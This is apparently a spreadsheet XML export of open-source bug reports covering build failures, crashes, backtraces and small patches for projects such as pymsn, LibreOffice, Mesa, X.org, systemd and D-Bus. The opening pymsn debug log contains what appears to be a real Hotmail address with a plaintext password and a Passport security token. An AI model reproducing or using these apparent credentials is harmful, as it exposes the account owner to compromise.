Connection: Keep-Alive
Cache-Control: no-cache
Content-Type: text/xml charset=utf-8
{7108E71A-9926-4FCB-BCC9-9A9D3F32E423}41AQAAAAIAAABsYwQAAAAxMDMzkimbix@hotmail.comlinox45http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issuehttp://Passport.NET/tbhttp://schemas.xmlsoap.org/ws/2004/04/security/trust/Issuemessenger.com
DEBUG:Transport:&lt;&lt;&lt; FLN pymsn.rewrite@yahoo.com 32 8390656 https://sec.yimg.com/i/us/nt/b/purpley.1.0.png
DEBUG:Transport:&lt;&lt;&lt; UBX pymsn.rewrite@yahoo.com 32 24
        [payload]
DEBUG:Transport:&lt;&lt;&lt; FLN toto@yahoo.com 32 8390656 https://sec.yimg.com/i/us/nt/b/purpley.1.0.png
DEBUG:Transport:&lt;&lt;&lt; UBX toto@yahoo.com 32 24
        [payload]
DEBUG:Transport:&lt;&lt;&lt; FLN mama@yahoo.com 32 8390656 https://sec.yimg.com/i/us/nt/b/purpley.1.0.png
DEBUG:Transport:&lt;&lt;&lt; UBX mama@yahoo.com 32 24
        [payload]
DEBUG:Transport:&lt;&lt;&lt; FLN papa@yahoo.com 32 8390656 https://sec.yimg.com/i/us/nt/b/purpley.1.0.png
DEBUG:Transport:&lt;&lt;&lt; UBX papa@yahoo.com 32 24
        [payload]
DEBUG:Transport:&lt;&lt;&lt; FLN lola@yahoo.com 32 8390656 https://sec.yimg.com/i/us/nt/b/purpley.1.0.png
DEBUG:Transport:&lt;&lt;&lt; UBX lola@yahoo.com 32 24
        [payload]
DEBUG:Transport:&lt;&lt;&lt; FLN bill@yahoo.com 32 8390656 https://sec.yimg.com/i/us/nt/b/purpley.1.0.png
DEBUG:Transport:&lt;&lt;&lt; UBX bill@yahoo.com 32 24
        [payload]
DEBUG:Service:&lt;&lt;&lt; HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon 13 Aug 2007 11:40:38 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYPPLOGN2A26 V: 0
P3P: CP=DSP CUR OTPi IND OTRi ONL FIN
X-Powered-By: ASP.NET
Content-Type: text/html charset=iso-8859-1
Expires: Mon 13 Aug 2007 11:39:38 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4294
1000640008C8FCD673.100.2199.03.0.869.00x488030x0BAYPPLOGN2A26 2007.07.10.00.04.54MH= path=/ domain=.msn.com expires=Wed 30-Dec-2037 16:00:00 GMTMHW= path=/ domain=.msn.com expires=Thu 30-Oct-1980 16:00:00 GMTMH= path=/ domain=.live.com expires=Wed 30-Dec-2037 16:00:00 GMTMHW= path=/ domain=.live.com expires=Thu 30-Oct-1980 16:00:00 GMTtrue254a17df8ede565c1urn:passport:legacyhttp://Passport.NET/tb2007-08-13T11:40:38Z2007-08-14T11:40:38Zhttp://Passport.NET/STSASRgLhQogxkUnTuBIIZztTXjIo5JSSdMpU0+XWc3PYzs2RTWYZ0uVDhU/nCfPgqk2yG6VPZxVyr2pmtrDjQqlW6NFL1pY8YEz4arIPSsVyIf/7MOCCyXj0ibpgD2aOEQ3SmXqr12b4rE/OJ2Pln8JtFNHINBS+oYGgkUtUHkGXhqV2K99AO6TMoR7G//t41rex62H5emeQ7FIkKlro+n/jPSdvU7PenxseUi3Pi38oDj0aGHN/IIBcRAmaztWbJn1mEiO7yMhrTD5Iik9QKXxtXGmrAl9hmphf6pkVH3G2xdikhDKcP8UINGjXxrfh7TMr8oet+f2A7uvQSQBnZnfkdF+FkmasamJ93V++qn2AYOoiWwtmZz/qxC17I4aBW2YXb2V2YHCJVpMMR6G4BPUmZGEQjXTccYTj2PD3TWc8MO9DnmX7lMJjpeTzn+AwUoiWbkblg=tooTEXe9Yw91zLuRqitQQFqdQw0BFs62messenger.comS:ClientInvalid Request0x8004882a0x80045b02
Traceback (most recent call last):
  File /home/asabil/Devel/pymsn/pymsn.devel/pymsn/service/SOAPService.py line 234 in _response_handler
    handler(callback errback response user_data)
  File /home/asabil/Devel/pymsn/pymsn.devel/pymsn/service/SingleSignOn.py line 174 in _HandleRequestMultipleSecurityTokensResponse
    token.type = node.find(./wst:TokenType).text
AttributeError: 'NoneType' object has no attribute 'text'
No online contacts</t>
  </si>
  <si>
    <t>LIBREOFFICE-38591</t>
  </si>
  <si>
    <t>Format -&gt; Character -&gt; Font : font overwrapped shown in preview erea</t>
  </si>
  <si>
    <t>Created attachment 48324
font_preview_JA_LO340_NG.png
Hi
[LibreOffice3.4.0  OOO340m1(Build:12)
WinXP SP3 Win7 - JAPANESE -]
Language Settings
  UI:Japanese
  Locale:Japanese
Format -&gt; Character -&gt; Font : font overwrapped shown in preview 
attached file:
font_preview_JA_LO340_NG.png</t>
  </si>
  <si>
    <t>PIGLIT-50802</t>
  </si>
  <si>
    <t>crash-cubemap-order build failure on Solaris</t>
  </si>
  <si>
    <t>piglit: 3df8bff4042d1d13379ad4c53a4155ef12a90add (master)
[  2%] Built target piglitutil
Linking C executable ../../../../bin/crash-cubemap-order
Undefined                       first referenced
 symbol                             in file
__1cG__CrunIex_alloc6FI_pv_         ../../../../lib/libpiglitutil.so
__1cG__CrunIex_throw6Fpvpkn0AQstatic_type_info_pF1_v_v_ ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___Esize6kM_I_ ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___2G6Mrk1_r1_ ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___2t6Mpkc3rkn0C__v_ ../../../../lib/libpiglitutil.so
__1cH__rwstdK__rw_basis4CpcnDstdJallocator4Cc___Edata6kM_1_ ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___Efind6kMcI_I_ ../../../../lib/libpiglitutil.so
__1cDstdTallocator_interface4n0AJallocator4Cc__Cc_2t6Mrkn0B__v_ ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___2T6M_v_ ../../../../lib/libpiglitutil.so
__1cDstdZ__RTTI__1nDstdJbad_alloc__ ../../../../lib/libpiglitutil.so
__1cDstdLchar_traits4Cc_Deof6F_i_   ../../../../lib/libpiglitutil.so
__1cH__rwstdL__construct4CcCc_6FpTArkTB_v_ ../../../../lib/libpiglitutil.so
__1cDstdJallocator4Cc_2t6M_v_       ../../../../lib/libpiglitutil.so
__1cDstdTallocator_interface4n0AJallocator4Cc__Cc_Iallocate6MIpc_2_ ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___2F6kMI_rkc_ ../../../../lib/libpiglitutil.so
__1cDstdJexceptionG__vtbl_          ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___Gsubstr6kMII_1_ ../../../../lib/libpiglitutil.so
__1cDstdJbad_allocG__vtbl_          ../../../../lib/libpiglitutil.so
__1cDstdTallocator_interface4n0AJallocator4Cc__Cc_Iallocate6MIpc_2_ ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___2F6kMI_rkc_ ../../../../lib/libpiglitutil.so
__1cDstdJexceptionG__vtbl_          ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___Gsubstr6kMII_1_ ../../../../lib/libpiglitutil.so
__1cDstdJbad_allocG__vtbl_          ../../../../lib/libpiglitutil.so
__1cDstdTallocator_interface4n0AJallocator4Cc__Cc_Kdeallocate6MpcI_v_ ../../../../lib/libpiglitutil.so
__1cDstdMbasic_string4Ccn0ALchar_traits4Cc__n0AJallocator4Cc___Fc_str6kM_pkc_ ../../../../lib/libpiglitutil.so
__1cH__rwstdK__rw_basis4CpcnDstdJallocator4Cc___2G6Mrk1_3_ ../../../../lib/libpiglitutil.so
__1cG__CrunMex_rethrow_q6F_v_       ../../../../lib/libpiglitutil.so
__1cDstdDmax4CI_6FrkTA3_3_          ../../../../lib/libpiglitutil.so
__1cG__CrunHex_skip6F_b_            ../../../../lib/libpiglitutil.so
__1cG__CrunIex_clean6F_v_           ../../../../lib/libpiglitutil.so
__1cG__CrunKex_rethrow6F_v_         ../../../../lib/libpiglitutil.so
__1cH__rwstdK__rw_basis4CpcnDstdJallocator4Cc___2t6Mirkn0C__v_ ../../../../lib/libpiglitutil.so
__1c2n6FI_pv_                       ../../../../lib/libpiglitutil.so
__1c2k6Fpv_v_                       ../../../../lib/libpiglitutil.so
ld: fatal: symbol referencing errors. No output written to ../../../../bin/crash-cubemap-order
gmake[2]: *** [bin/crash-cubemap-order] Error 2
00144cb77fd3afc05cfb4183b44e16a8bab175c0 is the first bad commit
commit 00144cb77fd3afc05cfb4183b44e16a8bab175c0
Author: Pauli Nieminen 
Date:   Sat May 19 01:20:08 2012 +0300
    make: Make util libraries shared in non-windows systems
    Incremental builds take long time linking tests if utilities are
    modified. The link time can be eliminate if libraries are made shared.
    Shared libraries need to specify symbols that are excepted to be
    declared in executeable as weak to allow linking without symbols that
    aren't used in runtime.
    Windows has limitation that shared library can't have programs main
    function that forces windows to use static libraries.
    Signed-off-by: Pauli Nieminen 
    Reviewed-by: Chad Versace 
    Acked-by: Kenneth Graunke 
:040000 040000 b4ede502b8299e739841796313f7a65e7763f81e af6140cf2402ab3762a6c80df4eb90d9b8f0980a M	cmake
:040000 040000 8ef09bd9b297a90d5ab8627b8cef36dc11952966 aed5bca7de39192ec9c55420a21bfbe8c0d026f1 M	tests</t>
  </si>
  <si>
    <t>TELEPATHY-40695</t>
  </si>
  <si>
    <t>Expose more caps code to plugins</t>
  </si>
  <si>
    <t>It'd be cool if we could write plugins which did more with caps like adding data forms to the GabbleCapsChannelManager.represent_client vfunc and stuff like that.
Here's a branch which exposes more.</t>
  </si>
  <si>
    <t>SYSTEMD-50127</t>
  </si>
  <si>
    <t>[PATCH] [udev] Add support for Lenovo IdeaPad Z570 keyboard</t>
  </si>
  <si>
    <t>Created attachment 61862
95-keymap.rules patch to add support for Lenovo IdeaPad Z570 laptop keyboard
The patch remaps KEY_TOUCHPAD_ON and KEY_TOUCHPAD_OFF to F22 and F23 so that Xorg server and X11 applications could handle them.</t>
  </si>
  <si>
    <t>XORG-46903</t>
  </si>
  <si>
    <t>Mention xkeyboard-config(7) in setxkbmap(1)</t>
  </si>
  <si>
    <t>Created attachment 57932
Mention xkeyboard-config(7) in setxkbmap(1)
Hi
setxkbmap is a great tool but one has to guess the name of known
keyboard models layouts and variants. xkeyboard-config(7) lists all
that (and more). It would be very nice if setxkbmap(1) was modified to
mention it.
Attached a patch that addresses this minor issue.
Cheers.</t>
  </si>
  <si>
    <t>mehdi</t>
  </si>
  <si>
    <t>MESA-32511</t>
  </si>
  <si>
    <t>glDrawPixels broken on savage</t>
  </si>
  <si>
    <t>Created attachment 41267
full backtrace in savageWriteRGBASpan_565()
The drawpix demo draws pixels spread around the screen instead of inside the window. Each line drawn (194 pixels) get displayed in a cluster but not as a line. Only every 6th line get displayed starting from the lower right of the screen going left then up (see drawpix-many.png).
The cluster is divided in 4 squares of 8 times 8 pixels where the first and fourth square is not complete. Each square is drawn from left to right then from top to bottom. Square are drawn from left to right within a cluster. (See drawpix-line.png).
I have tracked the drawing in mesa down to where it writes each pixel into the renderbuffer in savageWriteRGBASpan_565() see the full backtrace in write_rgba-backtrace.gdb.
This is with latest git. I think I have seen similar corruption using the antspotlight screensaver since a long time ago and I never tried drawpix before so this can be an old bug. The bug reporter of the downstream Ubuntu bug says drawpix worked fine in Ubuntu 8.04 which had mesa 7.0.3.</t>
  </si>
  <si>
    <t>DRI-82458</t>
  </si>
  <si>
    <t>[ILK] GPU hangs during normal desktop usage</t>
  </si>
  <si>
    <t>Created attachment 104424
GPU crash dump
Using Xubuntu 14.04 (3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux).
Screen freezes and doesn't recover. Mouse pointer can be moved but no action is possible. Switching to console (Ctrl+Alt+F1) takes some time but finally works. 
Syslog says:
kernel: [41262.418736] [drm] stuck on render ring
kernel: [41262.418745] [drm] GPU crash dump saved to /sys/class/drm/card0/error
kernel: [41262.418747] [drm] GPU hangs can indicate a bug anywhere in the entire gfx stack including userspace.
kernel: [41262.418749] [drm] Please file a _new_ bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
kernel: [41262.418751] [drm] drm/i915 developers can then reassign to the right component if it's not a kernel issue.
kernel: [41262.418754] [drm] The gpu crash dump is required to analyze gpu hangs so please always attach it.
kernel: [41262.423397] [drm:i915_set_reset_status] *ERROR* render ring hung inside bo (0x40c8000 ctx 0) at 0x40c961c
kernel: [41268.398388] [drm] stuck on render ring
kernel: [41274.390087] [drm] stuck on render ring
kernel: [41280.405822] [drm] stuck on render ring
...</t>
  </si>
  <si>
    <t>DBUS-3920</t>
  </si>
  <si>
    <t>dbus-viewer crashes while introspecting recursive nodes</t>
  </si>
  <si>
    <t>The order of arguments in one of the dbus_g_proxy_call invocations in
dbus-viewer.c is wrong.  Here is the patch:
Index: dbus-viewer.c
===================================================================
RCS file: /cvs/dbus/dbus/tools/dbus-viewer.cv
retrieving revision 1.14
diff -u -c -r1.14 dbus-viewer.c
cvs diff: conflicting specifications of output style
*** dbus-viewer.c	6 Jul 2005 21:27:45 -0000	1.14
--- dbus-viewer.c	30 Jul 2005 14:55:56 -0000
***************
*** 182189 ****
          }
        if (!dbus_g_proxy_call (proxy Introspect error
- 			      G_TYPE_STRING &amp;data
  			      G_TYPE_INVALID
  			      G_TYPE_INVALID))
  	  goto done
--- 182189 ----
          }
        if (!dbus_g_proxy_call (proxy Introspect error
  			      G_TYPE_INVALID
+ 			      G_TYPE_STRING &amp;data
  			      G_TYPE_INVALID))
  	  goto done</t>
  </si>
  <si>
    <t>LIBREOFFICE-66288</t>
  </si>
  <si>
    <t>Crash when Opening ODT File</t>
  </si>
  <si>
    <t>Steps to Reproduce:
1. Download this file: https://wiki.documentfoundation.org/images/1/1e/Regressions.odt
2. Try to open with master build - I did my build a few days ago
Observed:
Crash
Expected:
Open
Last Worked: Works fine with 4.1 RC1</t>
  </si>
  <si>
    <t>XORG-10217</t>
  </si>
  <si>
    <t>Gnome login page has really small fonts</t>
  </si>
  <si>
    <t>This didn't happen either with the i810 driver or with the modesetting one.
I've changed to the intel driver and the Ubuntu Login page has really small fonts in the login name and passwd field and in the options menu.
I'm attaching a photo of the problem.
All the rest of the fonts (in the system the browser the menus...) are fine.
If I can help with something else please tell me.
xserver-xorg-video-intel  1.9.91-0ubuntu1
Best regards
Emilio</t>
  </si>
  <si>
    <t>PIXMAN-12776</t>
  </si>
  <si>
    <t>README file shouldn't be empty</t>
  </si>
  <si>
    <t>It should at least contain some basic boilerplate to explain what the package is about. Here is a patch to fix it.</t>
  </si>
  <si>
    <t>TELEPATHY-28143</t>
  </si>
  <si>
    <t>Implement Connection.Balance interface support</t>
  </si>
  <si>
    <t>Add Connection.Balance interface support to Tp::Connection</t>
  </si>
  <si>
    <t>MESA-5199</t>
  </si>
  <si>
    <t>Mesa bug fixes from accelerated indirect rendering work</t>
  </si>
  <si>
    <t>I've been working on getting accelerated indirect rendering working and in the
process I've come across 3 problems in mesa:
  - The DRI drawable destructor need to remove the drawable from the hash table
so it isn't freed again during the drawable garbage collection.  Conversely the
garbage collection shoudn't do this.  In the direct rendering case this never
happens since we don't call the DRI drawable destructor directly it's only
invoked during the garbage collection.
  - _gl_copy_visual_to_context_mode() should set the mode-&gt;rgbBits and
mode-&gt;indexBits corresponding to the actual mode instead of setting both to
config-&gt;bufferSize.
  - I've removed the xf86drm.h include from dri_interface.h since it isn't used
by anything in the file.  dri/common/dri_util.h includes xf86drm.h indirectly
this way but the patch adds and explicit include there.
See also: bug 4988.</t>
  </si>
  <si>
    <t>LIBREOFFICE-43108</t>
  </si>
  <si>
    <t>LOCALHELP: DE-Help file refers to OOo instead of LibO (DE-Signaturen)</t>
  </si>
  <si>
    <t>Created attachment 53703
screenshot of help section (german)
Steps to reproduce:
0. Install German Help package 
1. 
2. 'Find' - Search Term openoffice - 
3. click on 'Ãœber digitale Signaturen` and pull down to `
Signaturen und Softwareversionen` There you read 'Ab OpenOffice.org 3.2 und StarOffice 9.2 werden alle Elemente mit Ausnahme der Signatur selbst (META-INF/documentsignatures.xml) signiert.'
This text is correct but it applies to LibreOffice also. In general this text refers to OpenOffice more than is should as it could deliver the same information referring to LibreOffice. The exact text at least should be amended to LibO.
I guess it's the same in other languages but I don't know how to test that.
Platform (if different from the browser): Linux (Ubuntu 10.10)</t>
  </si>
  <si>
    <t>XORG-30160</t>
  </si>
  <si>
    <t>[bisected] xserver build error</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform:   piketon
Libdrm:    (master)2.4.21-15-gb04515c5d6c95f573457a94267b855cceb639105
Mesa:     (glsl2)b7e63c34e74ecfb1c4af8132471ca9cb70d28d1f
Xserver: (master)xorg-server-1.8.99.905-12-g8d7b7a0d71e0b89321b3341b781bc8845386def6
Xf86_video_intel: (master)2.12.0-65-g6304cb048c745be81dae13f1d936996e04eaa530
Bug detailed description:
-------------------------
xserver build fails with errors:
xf86VGAarbiter.c:1126: error: conflicting types for 'xf86VGAarbiterDeviceDecodes'
xf86VGAarbiter.h:43: note: previous declaration of 'xf86VGAarbiterDeviceDecodes' was here
make[5]: *** [xf86VGAarbiter.lo] Error 1
Bisect find the first bad commit is 65466652936bbb2706be455d0a416bcf08e88f66.
Author:     Tiago Vignatti 
AuthorDate: Wed May 12 13:03:14 2010 +0300
Commit:     Tiago Vignatti 
CommitDate: Thu Aug 26 18:17:12 2010 +0300
    xfree86: vgaarb: fix device decoding interface to send resources type properly
    Right now when there is more than one vide card on the machine we're
    adopting a pessimistic approach and setting all cards to decode VGA legacy
    address.
    Some cards may want to skip the arbitration and the only way to do so is
    through pci_device_vgaarb_decodes. Therefore send the desired kind of
    resource instead force the worst case.
    Note that xf86VGAarbiterDeviceDecodes is not being used so far by any
    open-source driver. Even so API break.
    Signed-off-by: Tiago Vignatti 
    Reviewed-by: Mark Kettenis 
Reproduce steps:
----------------
1. ./autogen --prefix=/opt/X11R7
2. make</t>
  </si>
  <si>
    <t>SYSTEMD-75310</t>
  </si>
  <si>
    <t>systemd 209 stocked at boot after reaching socket.target</t>
  </si>
  <si>
    <t>journalctl says:
systemd 209 running in system mode. (+PAM -LIBWRAP -AUDIT -SELINUX -IMA -SYSVINIT +LIBCRYPTSETUP +GCRYPT +ACL +XZ +SECCOMP)
...
Assertion '(x-&gt;type == SOURCE_MONOTONIC &amp;&amp; y-&gt;type == SOURCE_MONOTONIC) || (x-&gt;type == SOURCE_REALTIME &amp;&amp; y-&gt;type == SOURCE_REALTIME)' failed at src/libsystemd/sd-event/sd-event.c:264 function latest_time_prioq_compare(). Aborting.
Caught  not dumping core.
Freezing execution.
...
nothing happens after it (5min)
systemd configured as:
--disable-audit         \
--disable-ima           \
--disable-selinux       \
--disable-silent-rules  \
--disable-static        \
--disable-tcpwrap       \
--enable-compat-libs    \
--with-firmware-path=/usr/lib/firmware  \
--with-sysvinit-path=   \
--with-sysvrcnd-path=
running on linux 3.12.11
I see this problem only on my physical box. A live image prepared with same environment boots just fine.</t>
  </si>
  <si>
    <t>PIXMAN-21724</t>
  </si>
  <si>
    <t>X server crashes in libpixman when loading iceweasel</t>
  </si>
  <si>
    <t>Created attachment 25840
Xorg log containing crash backtrace
The server consistently crashes when iceweasel loads using both radeon and vesa drivers.  It will also crash when epiphany loads a heavy page such as youtube.com.  The following backtrace comes from the log:
Backtrace:
0: /opt/xorg-ati-free/bin/Xorg(xorg_backtrace+0x28) [0x46a318]
1: /opt/xorg-ati-free/bin/Xorg [0x46e38d]
2: /lib/libc.so.6 [0x7fb2ad7b2f60]
3: /opt/xorg-ati-free/lib64/libpixman-1.so.0(pixman_region32_contains_point+0x9b
) [0x7fb2aebb03db]
4: /opt/xorg-ati-free/lib64/libpixman-1.so.0 [0x7fb2aebc1fc4]
5: /opt/xorg-ati-free/lib64/libpixman-1.so.0 [0x7fb2aebbb38c]
6: /opt/xorg-ati-free/lib64/libpixman-1.so.0 [0x7fb2aebbff94]
7: /opt/xorg-ati-free/lib64/libpixman-1.so.0(pixman_image_composite+0x5b3) [0x7f
b2aebbf8c3]
8: /opt/xorg-ati-free/lib64/xorg/modules/libfb.so(fbComposite+0x1ba) [0x7fb2ab9e
ec4a]
9: /opt/xorg-ati-free/bin/Xorg [0x4d5518]
10: /opt/xorg-ati-free/bin/Xorg [0x4ce576]
11: /opt/xorg-ati-free/bin/Xorg [0x459c34]
12: /opt/xorg-ati-free/bin/Xorg [0x428305]
13: /lib/libc.so.6(__libc_start_main+0xe6) [0x7fb2ad79f1a6]
14: /opt/xorg-ati-free/bin/Xorg [0x427eb9]
Segmentation fault at address (nil)
Iceweasel simply reports the following:
rah@myrtle:~$ DEBUG=1 iceweasel
firefox-bin: Fatal IO error 104 (Connection reset by peer) on X server :0.0.
rah@myrtle:~$</t>
  </si>
  <si>
    <t>DBUS-35173</t>
  </si>
  <si>
    <t>bus-test fails if extra fds are open on startup e.g. under gdb</t>
  </si>
  <si>
    <t>Attachment #42466 makes bus-test pass when given fds beyond 2 by the parent process (for instance under gdb). I'm splitting this off because it's not required to fix the bug it's attached to.
Colin Walters reviewed it and said:
&gt; ::: dbus/dbus-message-private.h
&gt; @@ +1393 @@
&gt;                                                  va_list          var_args)
&gt; 
&gt; +void _dbus_close_excess_fds(void)
&gt; 
&gt; Would prefer this lived in dbus-sysdeps.h.
&gt; 
&gt; ::: dbus/dbus-message-util.c
&gt; @@ +1823 @@
&gt; +      closedir(d)
&gt; +    }
&gt; +#endif
&gt; 
&gt; This needs a non-#ifdef __linux__ implementation (and should probably fall back
&gt; if the open of /prof/self/fd fails for some reason too).
&gt; 
&gt; This code is definitely scattered around look at e.g.
&gt; dbus-sysdeps-unix.c:3108 where we use sysconf (_SC_OPEN_MAX) and then a loop. 
&gt; I think it'd be worth at least refactoring that bit to use this common
&gt; function.
&gt; 
&gt; Also I suggest a better name is:
&gt; 
&gt; _dbus_close_nonstandard_fds ()
&gt; 
&gt; Or possibly
&gt; 
&gt; _dbus_close_fds_from (3) ?
to which I replied:
&gt; (In reply to comment #8)
&gt; &gt; This needs a non-#ifdef __linux__ implementation (and should probably fall &gt; back
&gt; &gt; if the open of /prof/self/fd fails for some reason too).
&gt; 
&gt; For this purpose it doesn't need a fallback: it's meant to be an exact mirror
&gt; of the check for leaked fds in the same file. Both are #ifdef __linux__ and
&gt; only used in the regression tests.
&gt; 
&gt; &gt; _dbus_close_nonstandard_fds ()
&gt; 
&gt; It'd be reasonable to put that function (and perhaps the leak check too) in
&gt; sysdeps-util though and if placed in that location I agree it should be
&gt; cross-platform.
Thinking about this again it'd be better still if we made the check for leaked fds work like this:
* remember the initial set of fds
* do the test
* complain about any fds not found in the set we remembered
This would avoid breaking any tools that relied on having bonus fds open for their own purposes for instance Valgrind can be told to report to fd 3 if you don't want its output to get interleaved with your stdout and/or stderr.</t>
  </si>
  <si>
    <t>DRI-83088</t>
  </si>
  <si>
    <t>[BDW]igt/pm_rpm some subcases fail</t>
  </si>
  <si>
    <t>Created attachment 105269
dmesg
==System Environment==
--------------------------
Regression: No. 
There has another bug 80121
Non-working platforms: BDW
==kernel==
--------------------------
origin/drm-intel-nightly: d82af52b1766594ece621e427f1604194ca2b415(fails)
    drm-intel-nightly: 2014y-08m-25d-23h-30m-00s integration manifest
origin/drm-intel-next-queued: 0f09bb2bf3d51a1e57e8dfc46e3c159170651c29(fails)
    drm/i915/bdw: Make sure error capture keeps working with Execlists
origin/drm-intel-fixes: 1a125d8a2c22b11741fc47d4ffcf7a5ffa044dd3(fails)
    drm/i915: don't try to retrain a DP link on an inactive CRTC
==Bug detailed description==
igt/pm_rpm some subcases fail
Case list:
igt/pm_rpm/cursor
igt/pm_rpm/cursor-dpms
igt/pm_rpm/legacy-planes
igt/pm_rpm/legacy-planes-dpms
igt/pm_rpm/system-suspend
igt/pm_rpm/universal-planes
igt/pm_rpm/universal-planes-dpms
Output:
[root@x-bdw02 tests]# ./pm_rpm --run-subtest cursor
IGT-Version: 1.7-g50166d2 (x86_64) (Linux: 3.17.0-rc1_drm-intel-nightly_d82af5_20140826+ x86_64)
Runtime PM support: 1
PC8 residency support: 1
Test assertion failure function cursor_subtest file pm_rpm.c:1425:
Failed assertion: wait_for_suspended()
Last errno: 2 No such file or directory
Subtest cursor: FAIL
==Reproduce steps==
---------------------------- 
1. ./pm_rpm --run-subtest cursor</t>
  </si>
  <si>
    <t>TELEPATHY-42049</t>
  </si>
  <si>
    <t>base-contact-list doesn't implement TP_TOKEN_CONNECTION_INTERFACE_CONTACT_BLOCKING_BLOCKED</t>
  </si>
  <si>
    <t>It should: http://telepathy.freedesktop.org/spec/Connection_Interface_Contact_Blocking.html#contact-attributes</t>
  </si>
  <si>
    <t>DBUS-7612</t>
  </si>
  <si>
    <t>Configure [and build] failure fro dbus-python from git</t>
  </si>
  <si>
    <t>This is the console log of my jhbuild sandbox
luca@redrum:~/cvs/gnome2/dbus-python$ jhbuild buildone dbus-python
*** Checking out dbus-python *** [1/1]
git pull
* refs/heads/origin: same as branch 'master' of
git://anongit.freedesktop.org/git/dbus/dbus-python
Already up-to-date.
*** Building dbus-python *** [1/1]
python setup.py build
ERROR: running git-log (usage: git-rev-list [OPTION] ... [ -- paths... ]
  limiting output:
    --max-count=nr
    --max-age=epoch
    --min-age=epoch
    --sparse
    --no-merges
    --all
  ordering output:
    --merge-order [ --show-breaks ]
    --topo-order
  formatting output:
    --parents
    --objects
    --unpacked
    --header | --pretty
  special purpose:
    --bisect)
*** Installing dbus-python *** [1/1]
python setup.py install --prefix /opt/gnome2
ERROR: running git-log (usage: git-rev-list [OPTION] ... [ -- paths... ]
  limiting output:
    --max-count=nr
    --max-age=epoch
    --min-age=epoch
    --sparse
    --no-merges
    --all
  ordering output:
    --merge-order [ --show-breaks ]
    --topo-order
  formatting output:
    --parents
    --objects
    --unpacked
    --header | --pretty
  special purpose:
    --bisect)
*** success *** [1/1]
Jhbuild says success but dbus-python neither installed nor builded.</t>
  </si>
  <si>
    <t>GSTREAMER_SDK-59250</t>
  </si>
  <si>
    <t>Error linking ffmpeg in ANDROID</t>
  </si>
  <si>
    <t>Created attachment 72867
jni/Android.mk
Hi
I have been testing the Android Tutorial5 from gstreamer-sdk. 
When I try to build the project with support for ffmpeg plugin I keep getting following error:
luigi@Fender:~/workspace/Tutorial5$ ndk-build  
GStreamer      : [GEN] =&gt; gst-build/gstreamer_android.c
GStreamer      : [COMPILE] =&gt; gst-build/gstreamer_android.c
GStreamer      : [LINK] =&gt; gst-build/libgstreamer_android.so
/home/luigi/projects/android-ndk-r8d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/../lib/gcc/arm-linux-androideabi/4.6/../../../../arm-linux-androideabi/bin/ld.gold: /home/luigi/projects/gstreamer-sdk/lib/libavcodec.a(flashsvenc.o): in function flashsv_encode_frame:libavcodec/flashsvenc.c:169: error: undefined reference to 'compress2'
/home/luigi/projects/android-ndk-r8d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86/bin/../lib/gcc/arm-linux-androideabi/4.6/../../../../arm-linux-androideabi/bin/ld.gold: /home/luigi/projects/gstreamer-sdk/lib/libavcodec.a(tiffenc.o): in function encode_strip:libavcodec/tiffenc.c:165: error: undefined reference to 'compress'
The .o files are referencing compress and compress2 from zlib but the symbols in such library are z_compress and z_compress2 (there is a #define compress z_compress in the header) so i guess this is a compilation error? also I just need to use h264 from ffmpeg so is there any plugin or module i can disable for this error not to happen? (I don't really need flash or tiff decoding)
I am attaching the jni/Android.mk file is the only thing I changed in tutorial5 project.
Thanks
Luigi</t>
  </si>
  <si>
    <t>MESA-34628</t>
  </si>
  <si>
    <t>[ilk] skybox errors in quake4</t>
  </si>
  <si>
    <t>Created attachment 43718
skybox 1
System:
Intel Corporation Arrandale Integrated Graphics Controller
vanilla-kernel 2.6.36.2
libdrm mesa and xf86-video-intel git master
xorg-server-1.9.4
More quake4 problems.
Linux demo can be found here:
http://www.gamershell.com/download_11708.shtml
Ingame settings:
800x600 resolution
medium quality settings
Attached screenshots illustrate the problems with the skybox rendering.
Problem not present on r600g with my Radeon HD4750.
Greets
Tobias</t>
  </si>
  <si>
    <t>LIBREOFFICE-37901</t>
  </si>
  <si>
    <t>EDITING: Undo not available for Merge Cells in Calc</t>
  </si>
  <si>
    <t>If one merges cells in Calc there are two options in Format - Merge Cells. For the second option which is also called Merge Cells there is no UNDO functionality available. 
How to reproduce:
1. Select a couple of cells
2. Go to Format -&gt; Merge Cells -&gt; Merge Cells
3. Result: The cells are merged but not UNDO is possible.
Remark: For the first option which is called Merge and Center Cells the UNDO functionality works like expected.
System: Ubuntu 10.10 gnome 2 English UI LibreOffice 3.3.2 PPA.</t>
  </si>
  <si>
    <t>CAIRO-16116</t>
  </si>
  <si>
    <t>Firefox crash [@ _de_casteljau] due to infinite recursion of [@ _cairo_spline_decompose_into]</t>
  </si>
  <si>
    <t>We have multiple reports of Firefox 3.0 RC1 crashing on Windows
due to infinite recursion of _cairo_spline_decompose_into().
Is it a Cairo bug?
Originally filed in b.m.o.
https://bugzilla.mozilla.org/show_bug.cgi?id=435756
Example crash reports:
bp-e902c5b8-2769-11dd-a5b8-0013211cbf8a
